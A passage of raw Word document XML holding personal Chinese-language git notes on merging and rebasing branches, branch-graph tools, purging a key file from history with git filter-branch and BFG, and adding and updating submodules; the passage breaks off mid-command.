        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令来合并</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> dev </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分支到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> main </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分支：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B3B3E16" w14:textId="77777777" w:rsidR="00763C68" w:rsidRDefault="00763C68" w:rsidP="00763C68"/>
    <w:p w14:paraId="6AC99474" w14:textId="77777777" w:rsidR="00763C68" w:rsidRPr="00763C68" w:rsidRDefault="00763C68" w:rsidP="00763C68">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00763C68">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>git merge dev</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52510466" w14:textId="77777777" w:rsidR="00763C68" w:rsidRDefault="00763C68" w:rsidP="00763C68"/>
    <w:p w14:paraId="0922AA61" w14:textId="77777777" w:rsidR="00763C68" w:rsidRDefault="00763C68" w:rsidP="00763C68">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或者，如果你更喜欢使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> rebase </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的方式来合并分支，你也可以执行以下命令：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11EEFF3E" w14:textId="77777777" w:rsidR="00763C68" w:rsidRDefault="00763C68" w:rsidP="00763C68"/>
    <w:p w14:paraId="18C2A340" w14:textId="77777777" w:rsidR="00763C68" w:rsidRDefault="00763C68" w:rsidP="00763C68">
      <w:r>
        <w:t>git rebase dev</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DFD8ACA" w14:textId="77777777" w:rsidR="00763C68" w:rsidRDefault="00763C68" w:rsidP="00763C68"/>
    <w:p w14:paraId="02C25E99" w14:textId="77777777" w:rsidR="00763C68" w:rsidRDefault="00763C68" w:rsidP="00763C68">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>如果有冲突，在合并过程中会停下来，需要你解决这些冲突。解决完冲突后，你需要执行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> git add </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令来标记冲突已解决的文件，然后执行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> git rebase --continue </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> git merge --continue </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来继续合并过程。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75B3C6C1" w14:textId="77777777" w:rsidR="00763C68" w:rsidRDefault="00763C68" w:rsidP="00763C68"/>
    <w:p w14:paraId="0CDCDCA5" w14:textId="77777777" w:rsidR="00763C68" w:rsidRDefault="00763C68" w:rsidP="00763C68">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>最后，当合并完成，你可以将合并后的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> main </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分支推送到远程仓库：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70C4E3CA" w14:textId="77777777" w:rsidR="00763C68" w:rsidRDefault="00763C68" w:rsidP="00763C68"/>
    <w:p w14:paraId="4C63B4B8" w14:textId="77777777" w:rsidR="00763C68" w:rsidRPr="00763C68" w:rsidRDefault="00763C68" w:rsidP="00763C68">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00763C68">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    git push origin main</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2818C5E5" w14:textId="77777777" w:rsidR="00763C68" w:rsidRDefault="00763C68" w:rsidP="00763C68"/>
    <w:p w14:paraId="611B5A1C" w14:textId="596CADDE" w:rsidR="00763C68" w:rsidRDefault="00763C68" w:rsidP="00763C68">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过这些步骤，你就可以将本地的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> dev </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分支成功合并到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> main </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分支，并将更新推送到远程仓库。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E0949BB" w14:textId="77777777" w:rsidR="00763C68" w:rsidRDefault="00763C68" w:rsidP="00763C68"/>
    <w:p w14:paraId="621CA6EC" w14:textId="45F196FC" w:rsidR="00AB2386" w:rsidRDefault="00AB2386" w:rsidP="00AB2386">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>git</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分支图</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B0BF5B3" w14:textId="65593E4E" w:rsidR="00AB2386" w:rsidRDefault="00396360" w:rsidP="00AB2386">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我看有推荐</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>github desktop, source tree</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00396360">
        <w:t>GitKraken</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>收费</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EC75A4D" w14:textId="387D28F7" w:rsidR="00AB2386" w:rsidRDefault="00396360" w:rsidP="00AB2386">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>但是之前上班的时候看师傅用的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IDEA GIT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分支图也有不错的效果</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="544DA699" w14:textId="77777777" w:rsidR="00396360" w:rsidRPr="00AB2386" w:rsidRDefault="00396360" w:rsidP="00AB2386"/>
    <w:p w14:paraId="34F4F6A6" w14:textId="77777777" w:rsidR="00396360" w:rsidRPr="00396360" w:rsidRDefault="00396360" w:rsidP="00396360">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00396360">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>idea git</w:t>
      </w:r>
      <w:r w:rsidRPr="00396360">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>分支图</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EF0F226" w14:textId="77777777" w:rsidR="00AB2386" w:rsidRDefault="00AB2386" w:rsidP="00763C68"/>
    <w:p w14:paraId="7E05B35E" w14:textId="77777777" w:rsidR="00AB2386" w:rsidRDefault="00AB2386" w:rsidP="00763C68"/>
    <w:p w14:paraId="2B1E36BE" w14:textId="400C78FC" w:rsidR="00AB2386" w:rsidRDefault="00E50243" w:rsidP="00763C68">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="398A37A2" wp14:editId="5C514F24">
            <wp:extent cx="5274310" cy="3124835"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="769764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64119" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId30"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="3124835"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="38616B7F" w14:textId="29B14CB2" w:rsidR="005907AE" w:rsidRDefault="00E50243" w:rsidP="00763C68">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一般直接从</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Git</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这里就可以看到分支合并的这些东西了</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A933185" w14:textId="77777777" w:rsidR="00E50243" w:rsidRDefault="00E50243" w:rsidP="00763C68"/>
    <w:p w14:paraId="66FA8449" w14:textId="77777777" w:rsidR="00E50243" w:rsidRDefault="00E50243" w:rsidP="00763C68"/>
    <w:p w14:paraId="33C9299A" w14:textId="62A4B251" w:rsidR="005907AE" w:rsidRDefault="005907AE" w:rsidP="005907AE">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>g</w:t>
      </w:r>
      <w:r>
        <w:t>it</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>历史删除密钥文件</w:t>
      </w:r>
      <w:r w:rsidR="009148A6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、重写历史</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="005907AE">
        <w:t>git filter-branch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CAB1C94" w14:textId="77777777" w:rsidR="005907AE" w:rsidRDefault="005907AE" w:rsidP="00763C68"/>
    <w:p w14:paraId="19C148D5" w14:textId="77777777" w:rsidR="000A2333" w:rsidRDefault="000A2333" w:rsidP="00763C68"/>
    <w:p w14:paraId="15424A45" w14:textId="0A4F2814" w:rsidR="000A2333" w:rsidRPr="00763C68" w:rsidRDefault="00B562B9" w:rsidP="00763C68">
      <w:r w:rsidRPr="00B562B9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>git filter-branch --index-filter "git rm -r --cached --ignore-unmatch ./</w:t>
      </w:r>
      <w:r w:rsidRPr="00B562B9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>部署文件</w:t>
      </w:r>
      <w:r w:rsidRPr="00B562B9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>" HEAD</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A96E885" w14:textId="3A6330AD" w:rsidR="000A2333" w:rsidRDefault="000A2333" w:rsidP="002E3B62">
      <w:r w:rsidRPr="000A2333">
        <w:t>git filter-branch --index-filter "git rm -r --cached --ignore-unmatch ./backend/volume/media/import_excel_upload/*" HEAD</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C3D49D3" w14:textId="4A5B2A92" w:rsidR="00B562B9" w:rsidRDefault="00B562B9" w:rsidP="002E3B62">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>检查成功没有这个文件后，然后</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> git</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> push --force</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12AB0406" w14:textId="77777777" w:rsidR="00B562B9" w:rsidRDefault="00B562B9" w:rsidP="002E3B62"/>
    <w:p w14:paraId="14CB43A5" w14:textId="04BF9D7B" w:rsidR="00EE0C89" w:rsidRDefault="00EE0C89" w:rsidP="002E3B62">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果提示需要加</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-f </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>强制重写，如：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="398D5059" w14:textId="020EB8C8" w:rsidR="00EE0C89" w:rsidRDefault="00EE0C89" w:rsidP="002E3B62">
      <w:r w:rsidRPr="00EE0C89">
        <w:t>git filter-branch -f --index-filter "git rm -r --cached --ignore-unmatch ./backend/volume/media/import_excel_upload/*" HEAD</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BE59C36" w14:textId="77777777" w:rsidR="00EE0C89" w:rsidRDefault="00EE0C89" w:rsidP="002E3B62"/>
    <w:p w14:paraId="66C14CF9" w14:textId="0D6C6495" w:rsidR="00EE0C89" w:rsidRDefault="00EE0C89" w:rsidP="002E3B62">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>最后</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>git</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> push</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>即可</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07E966B4" w14:textId="77777777" w:rsidR="00EE0C89" w:rsidRPr="0026132D" w:rsidRDefault="00EE0C89" w:rsidP="002E3B62"/>
    <w:p w14:paraId="76BADDC1" w14:textId="1FD5F270" w:rsidR="00AF3DDE" w:rsidRPr="00FC61FA" w:rsidRDefault="00FA7C9A" w:rsidP="00FC61FA">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>重写</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>git</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>历史</w:t>
      </w:r>
      <w:r w:rsidR="00F77569">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：删除</w:t>
      </w:r>
      <w:r w:rsidR="00F77569">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>git</w:t>
      </w:r>
      <w:r w:rsidR="00F77569">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>历史中的大文件</w:t>
      </w:r>
      <w:r w:rsidR="00CE5910">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="00CE5910">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>bfg</w:t>
      </w:r>
      <w:r w:rsidR="00CE5910">
        <w:t>-repo-cleaner</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14B1CC04" w14:textId="77777777" w:rsidR="00AF3DDE" w:rsidRDefault="00AF3DDE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1EC48CAC" w14:textId="139977E6" w:rsidR="00AF3DDE" w:rsidRDefault="00AF3DDE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>git</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>及二进制文件：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BE92E5B" w14:textId="6A541E02" w:rsidR="00327C01" w:rsidRDefault="00F77569" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00F77569">
        <w:t>https://github.com/rtyley/bfg-repo-cleaner</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="411098CF" w14:textId="77777777" w:rsidR="00327C01" w:rsidRDefault="00327C01" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08EBC311" w14:textId="2C182B47" w:rsidR="00CE5910" w:rsidRDefault="00CE5910" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文档：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B1438D2" w14:textId="5304D917" w:rsidR="00F77569" w:rsidRDefault="00CE5910" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00CE5910">
        <w:t>https://rtyley.github.io/bfg-repo-cleaner/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CC23E58" w14:textId="77777777" w:rsidR="00F77569" w:rsidRDefault="00F77569" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21E4DF8E" w14:textId="6937CE02" w:rsidR="00327C01" w:rsidRDefault="00FC3D20" w:rsidP="00FC3D20">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>submodule</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60066CAF" w14:textId="77777777" w:rsidR="00FC3D20" w:rsidRDefault="00FC3D20" w:rsidP="00FC3D20"/>
    <w:p w14:paraId="721789A2" w14:textId="4FB36782" w:rsidR="00470E97" w:rsidRDefault="00DD5230" w:rsidP="00FC3D20">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接：</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD5230">
        <w:t>https://www.bilibili.com/video/BV1zK4y1N75x/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A84351D" w14:textId="77777777" w:rsidR="00470E97" w:rsidRDefault="00470E97" w:rsidP="00FC3D20"/>
    <w:p w14:paraId="5D998AAF" w14:textId="4F91464A" w:rsidR="00F03FCA" w:rsidRPr="00F03FCA" w:rsidRDefault="00F03FCA" w:rsidP="007A4AD2">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
          <w:b w:val="0"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F03FCA">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:hint="eastAsia"/>
          <w:bCs/>
        </w:rPr>
        <w:t>开发视角</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:hint="eastAsia"/>
          <w:bCs/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="00F03FCA">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:hint="eastAsia"/>
          <w:bCs/>
        </w:rPr>
        <w:t>主仓库</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0533A15F" w14:textId="7F5F0E3A" w:rsidR="00470E97" w:rsidRDefault="001D229E" w:rsidP="00FC3D20">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在某仓库中添加</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>submodule</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49B28B8F" w14:textId="6E96802B" w:rsidR="001D229E" w:rsidRPr="004D7755" w:rsidRDefault="001D229E" w:rsidP="00FC3D20">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D7755">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>git submod</w:t>
      </w:r>
      <w:r w:rsidRPr="00B119F9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>ule add &lt;git-source&gt;</w:t>
      </w:r>
      <w:r w:rsidR="00B119F9" w:rsidRPr="00B119F9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;option:path&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F4D011C" w14:textId="77777777" w:rsidR="00F03FCA" w:rsidRDefault="00F03FCA" w:rsidP="00FC3D20"/>
    <w:p w14:paraId="36F4DA58" w14:textId="5991384D" w:rsidR="00BA0B35" w:rsidRDefault="00417500" w:rsidP="00FC3D20">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>git status</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C0C66F8" w14:textId="40590D75" w:rsidR="00417500" w:rsidRPr="00DD7932" w:rsidRDefault="00417500" w:rsidP="00FC3D20">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>会看到子模块是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>new file,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>需要</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>git add .   git commit -m "xx" git push</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来吧当前子模块的哈希打上去更新</w:t>
      </w:r>
      <w:r w:rsidR="004D7755">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7591FBCB" w14:textId="77777777" w:rsidR="00544445" w:rsidRDefault="00544445" w:rsidP="00FC3D20"/>
    <w:p w14:paraId="0D1ECB89" w14:textId="775ED53D" w:rsidR="001F74B2" w:rsidRDefault="001F74B2" w:rsidP="001F74B2">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>之后子仓库如果有更新</w:t>
      </w:r>
      <w:r w:rsidR="007A4AD2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="007A4AD2" w:rsidRPr="007A4AD2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>子仓库自己先</w:t>
      </w:r>
      <w:r w:rsidR="007A4AD2" w:rsidRPr="007A4AD2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>git push</w:t>
      </w:r>
      <w:r w:rsidR="007A4AD2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="007A4AD2" w:rsidRPr="007A4AD2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="2E74B5" w:themeColor="accent1" w:themeShade="BF"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>再切到</w:t>
      </w:r>
      <w:r w:rsidR="007A4AD2" w:rsidRPr="007A4AD2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>主仓库</w:t>
      </w:r>
      <w:r w:rsidR="007A4AD2" w:rsidRPr="007A4AD2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>更新</w:t>
      </w:r>
      <w:r w:rsidR="007A4AD2" w:rsidRPr="007A4AD2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>submodule</w:t>
      </w:r>
      <w:r w:rsidR="007A4AD2" w:rsidRPr="007A4AD2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidR="007A4AD2" w:rsidRPr="007A4AD2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>hash</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7172FDB0" w14:textId="77777777" w:rsidR="001F74B2" w:rsidRPr="004D7755" w:rsidRDefault="001F74B2" w:rsidP="001F74B2">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D7755">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">git submodule update </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
      <w:r w:rsidRPr="004D7755">
        <w:rPr>
